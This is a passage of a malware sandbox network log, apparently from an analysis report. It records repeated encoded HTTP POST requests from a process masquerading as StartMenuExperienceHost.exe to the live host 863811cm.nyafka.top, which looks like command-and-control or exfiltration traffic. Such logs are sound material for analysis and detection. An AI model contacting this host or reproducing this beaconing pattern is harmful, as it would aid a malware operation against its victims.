                                                                Data Ascii: UZ]\T^]V^ZUXQVZZW_X\USQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+.0>)3'.,E(0_"0+U>!7+3.:>"3*;#Y$/\*-
                                                                Oct 11, 2024 01:37:20.341378927 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:20.586076975 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PJfYbBxEN%2FITKkUk5wlYU68Y4aV2bLcBrw5Sl%2B0DLmRuvGdtXaT6s9XW%2Bixd0oDgO1ccX3Xl0cE7vyRp%2Fe5ozjHeFSLJ%2FMMGZKojNIdQ8fIf8ENK0UjXdig5%2F4gDFpWWtGJNAor"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a700ddbf841d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                83192.168.2.550064188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:20.709003925 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:21.066504002 CEST2584OUTData Raw: 50 52 5d 5e 51 5f 5d 56 5e 5a 55 58 51 50 5a 5c 57 5a 58 5a 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]^Q_]V^ZUXQPZ\WZXZU]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-0Z>)?U2 C(&+5]<)3=#740-*(C"";>;#Y$/\*5
                                                                Oct 11, 2024 01:37:21.112833023 CEST1236OUTData Raw: 33 2c 51 14 33 58 5a 1f 08 57 3f 2e 05 20 30 0e 03 3a 0d 42 34 3b 1b 2f 0b 3d 5a 2c 3c 3d 14 08 36 5c 2b 50 3b 36 3e 27 21 2c 1e 2e 35 5f 07 2c 22 28 00 55 3e 0c 3b 1f 2f 0d 58 5c 3d 3f 30 2b 0d 3d 2d 16 37 03 2f 5d 0c 06 25 1c 3f 3e 0f 25 37 57
                                                                Data Ascii: 3,Q3XZW?. 0:B4;/=Z,<=6\+P;6>'!,.5_,"(U>;/X\=?0+=-7/]%?>%7W&<;+1?1+>:\S1$[?"$9ZZ9<7+,/*0,20#/: !0&8@[<X49T<1Y ?/#'6+? ,Y914??3+>3(:<&-]>1/"? :$)!$"<2
                                                                Oct 11, 2024 01:37:21.425285101 CEST1236OUTData Raw: 50 52 5d 5e 51 5f 5d 56 5e 5a 55 58 51 50 5a 5c 57 5a 58 5a 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]^Q_]V^ZUXQPZ\WZXZU]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-0Z>)?U2 C(&+5]<)3=#740-*(C"";>;#Y$/\*5
                                                                Oct 11, 2024 01:37:21.829632998 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:21.829725027 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:21.830234051 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:21.832093000 CEST1348OUTData Raw: 38 1c 1e 14 3e 02 0c 31 03 00 3b 3b 3c 0b 33 30 2a 04 30 59 3f 13 24 59 03 27 01 1a 01 5d 0c 30 34 33 00 5f 3c 41 3f 1d 09 3c 1a 2a 30 00 06 3a 35 01 31 3f 34 3c 02 3b 00 22 20 1d 29 3e 13 05 30 1f 0e 5f 31 26 3c 27 2d 03 00 17 3e 38 01 3e 2a 2d
                                                                Data Ascii: 8>1;;<30*0Y?$Y']043_<A?<*0:51?4<;" )>0_1&<'->8>*-=-,#5$5 0'V(?!%?&3,Q3XZW?. 0:B4;/=Z,<=6\+P;6>'!,.5_,"(U>;/X\=?0+=-7/]%?>%7W&<;+1?1+>:\S1$[?"$9ZZ9<7+,/*0,2
                                                                Oct 11, 2024 01:37:22.193816900 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nztye1K5r4xUy%2BNP7igjv%2FdIz7e%2BRvHkd5MKyiVZgLeS7KQAlB0io8Xk8smSNMRz%2FYpSNsLQ5KkcDfng8ZgWnvT2yXb2srDoBotj5L%2B2uTy%2FEQZVOfbQTLgKGFSEeHekCFrUUo1z"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7012e89f41d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:22.194330931 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:22.289119959 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:22.289330959 CEST540OUTData Raw: 50 58 58 59 54 59 58 56 5e 5a 55 58 51 54 5a 5b 57 5b 58 59 55 55 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PXXYTYXV^ZUXQTZ[W[XYUUQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(=+:+1= E+54_!;+?0=#$=1)(/",*#Y$/\*%
                                                                Oct 11, 2024 01:37:22.534554958 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FS9HSLy7GtlQevcoepu7kxAqnqZ%2F06kUhAhRme23lnDPm7vfFLBm26njGx7lJdGLRGt5uUfTQ8h78C0pwlv8apgOa7zU3kkvsZxeMWlKnhRFaQCdlLQF0SBBYUH4rAcjZtPkF9gF"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a701a082741d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:22.535161018 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:22.630389929 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:22.630724907 CEST2584OUTData Raw: 50 5f 5d 5b 51 5b 5d 52 5e 5a 55 58 51 51 5a 59 57 5e 58 5b 55 56 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_][Q[]R^ZUXQQZYW^X[UVQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(-((,%<@<^6("!44$!*('!2;*;#Y$/\*1
                                                                Oct 11, 2024 01:37:22.938079119 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdhihO7XkMN%2F%2BjvgjtPvESAnVEi4EOrKiPx5Lw%2BBnDkbDdrqJ53ZnWMDTz0tfv9zOoGOW12Tt2PfvhL5KpMMFC47v2WqNr4czWNrPDbRceg2ygoYyjLMV%2FLXOmbkg8GsmnVw30cq"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a701c2a6a41d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:22.938719034 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----GRKlSNI6DVRNDSY1D21kPFe0UPhgLxF1jY
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3014
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:23.033759117 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:23.034075022 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 47 52 4b 6c 53 4e 49 36 44 56 52 4e 44 53 59 31 44 32 31 6b 50 46 65 30 55 50 68 67 4c 78 46 31 6a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------GRKlSNI6DVRNDSY1D21kPFe0UPhgLxF1jYContent-Disposition: form-data; name="0"Content-Type: text/plainP^XYT[]V^ZUXQRZ\WXXYUQQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:23.291804075 CEST607INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kod8R83eVPl%2Bfz%2Fl2lix7TTJu8gAOhgwESGv4ZFywe5rg%2F%2FF%2Btbsk%2F2owQE%2BNTP2wHOlzcr%2FEtY%2Fa7Jea9UwS79N6BwPZMnGCPGC8N5cdwax9JozzOn4V5NswawhQK7G9XMgLAk0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a701ead5141d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:23.292087078 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:23.387289047 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:23.387429953 CEST2584OUTData Raw: 50 59 5d 5b 54 54 5d 56 5e 5a 55 58 51 51 5a 5b 57 59 58 5e 55 56 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PY][TT]V^ZUXQQZ[WYX^UVQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+$<*&?( \"?<3=V4 '."((+"8X>#Y$/\*1
                                                                Oct 11, 2024 01:37:23.686677933 CEST607INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYE7U2Ahv%2FbXJdQvIvMQIbTZaicrPaV083iSEZ3%2BshpxzbbcW1Kd1umSdOT%2BQsZTYyku8%2B4Uw%2BJp5V4%2F%2B8N6DwKaJwp%2FTt5VkHWQJ26s5wz4Yg%2FpVKmnsizuy2k4VffYQCN7MQs0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7020d80741d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                84192.168.2.550065188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:21.832251072 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:22.193170071 CEST1980OUTData Raw: 55 5e 5d 5c 54 55 5d 52 5e 5a 55 58 51 57 5a 58 57 5b 58 5f 55 5d 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]\TU]R^ZUXQWZXW[X_U]QYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_).?<)01,?5#+3Y(#9S7<0>>)4B"1#)#Y$/\*)
                                                                Oct 11, 2024 01:37:22.280930996 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:22.565748930 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xdi6ez9QrOabXYBMMcjVrsGSASh72jLZmSxwmDWZRTs0IBto2aRYcNiR1CstuU49CJa8epoUDixC0qoe3JaPoQ9P0%2BxSU5jD5u2Bee5PB1uJCZpArwb6uJXv%2BcXMvrKQYgxQrSsV"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7019fb630f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 3d 00 39 0c 23 58 33 5d 2c 21 28 5b 3e 2d 08 1b 2b 08 3b 10 24 24 37 14 39 3c 00 0c 23 3b 20 1a 29 05 31 02 30 3f 28 04 2b 0b 2a 51 03 1b 39 1c 2b 0a 27 54 28 1c 25 19 28 0b 31 5f 24 55 21 41 29 3d 35 51 27 3e 3a 5e 36 08 27 0c 2a 3c 38 0f 3b 5d 20 1b 3e 01 3d 03 20 3b 2a 5f 08 13 39 56 29 38 0e 54 21 27 3a 07 22 13 3c 0d 36 07 35 0b 3f 39 2a 57 33 0a 20 5e 38 22 3b 01 23 11 27 1e 21 2c 3e 1e 21 3d 37 05 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'=9#X3],!([>-+;$$79<#; )10?(+*Q9+'T(%(1_$U!A)=5Q'>:^6'*<8;] >= ;*_9V)8T!':"<65?9*W3 ^8";#'!,>!=72("_")Q?TR0
                                                                Oct 11, 2024 01:37:22.675964117 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:22.771692991 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:22.771972895 CEST1984OUTData Raw: 55 58 58 59 54 5a 58 51 5e 5a 55 58 51 5d 5a 52 57 51 58 5a 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UXXYTZXQ^ZUXQ]ZRWQXZU]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9((Z+ '.0(&35Z+W 7S0%><G" ^*#Y$/\*
                                                                Oct 11, 2024 01:37:23.073539019 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Uxcr78XPK0h1XB8NPohO3ftaZYeg87gs0oQPwCxpsF%2FBbNcfGa44zqGz8Uu41c7NOnV6J9u7d1neZqXq0TTk6GAJLJRdI8Daic5QC8lWRw4xLL938gsH88iLM1U0xsArkicwEQw"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a701d0f880f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 28 2a 2e 1f 34 00 37 59 2f 1f 2c 5b 3d 03 21 05 2b 0f 24 02 25 37 3f 5f 2d 02 21 1f 35 15 27 00 2a 5a 2e 5b 30 12 34 05 2b 1b 2a 51 03 1b 3a 07 3f 33 01 57 2b 31 31 5f 28 32 21 58 26 33 3a 1b 2a 03 36 09 33 3e 2d 01 36 31 28 57 2a 3c 0d 55 38 2b 2f 0a 3e 16 31 05 20 01 2a 5f 08 13 39 57 3e 16 2f 09 20 34 21 5d 36 2e 2b 10 36 17 00 53 3d 17 00 57 25 23 30 5e 2c 1c 0e 13 23 01 02 09 22 2c 03 0d 20 2e 2c 5b 32 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'(*.47Y/,[=!+$%7?_-!5'*Z.[04+*Q:?3W+11_(2!X&3:*63>-61(W*<U8+/>1 *_9W>/ 4!]6.+6S=W%#0^,#", .,[2"_")Q?TR0
                                                                Oct 11, 2024 01:37:23.175762892 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:23.270859957 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:23.271135092 CEST1984OUTData Raw: 55 5d 5d 5a 54 59 5d 54 5e 5a 55 58 51 51 5a 5b 57 5d 58 58 55 50 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]ZTY]T^ZUXQQZ[W]XXUPQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?>4<:+&X3<#;#<-S7$7R0-U(8"')#Y$/\*1
                                                                Oct 11, 2024 01:37:23.570271015 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yE9YrTtGVtWgu1KfJ6SgmszcmPADv1iL7qQy0pZLgWWd6igsHdvZzSUbnqJlWhX6lhDQqydQjQOxErx4CZwzT5NejRKGNOUfft52qqoCR7YhGRJPA7LLEEWeEsphK2%2FX5fuNmm22"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70202b930f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 2a 5f 39 0e 37 3e 3f 58 3b 1f 38 13 2a 13 3d 00 2b 0f 24 03 25 0a 33 59 39 3c 3a 0d 35 15 02 15 29 3f 22 59 33 02 3b 10 3f 31 2a 51 03 1b 39 59 2b 30 3b 50 28 54 31 5d 3c 32 2d 59 27 20 21 09 2a 13 35 51 24 2d 3d 07 23 31 2c 52 2a 3f 33 52 2f 3b 01 08 3e 5e 2e 5a 37 01 2a 5f 08 13 39 1c 2a 5e 28 1c 21 34 26 06 22 2e 28 0d 21 39 2d 0e 3e 07 22 50 30 23 2f 05 2d 32 0e 5e 34 3f 01 1d 23 2c 2e 1e 34 04 23 05 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'*_97>?X;8*=+$%3Y9<:5)?"Y3;?1*Q9Y+0;P(T1]<2-Y' !*5Q$-=#1,R*?3R/;>^.Z7*_9*^(!4&".(!9->"P0#/-2^4?#,.4#28"_")Q?TR0
                                                                Oct 11, 2024 01:37:23.675931931 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:23.771318913 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:23.772595882 CEST1984OUTData Raw: 50 58 5d 5d 51 5b 58 52 5e 5a 55 58 51 5d 5a 5e 57 58 58 59 55 55 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]]Q[XR^ZUXQ]Z^WXXYUUQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\+[?;R&=$+%6?S#'$$-U)8/"X*;#Y$/\*
                                                                Oct 11, 2024 01:37:24.074378014 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQqcyB%2BLbEH1mVsGyH8xWvgx%2BDydGMByNvBwQAD5glLRAysdeQlLAPHMHvq6EVpFItRkxx5g%2FIdGjzi0yuu2uMH%2BpZUL5xKynoONme9bj8FmKmtbkDiNOPvnfAxr66aECJhsEtdN"}],"group":"cf-nel","max_age":604800}
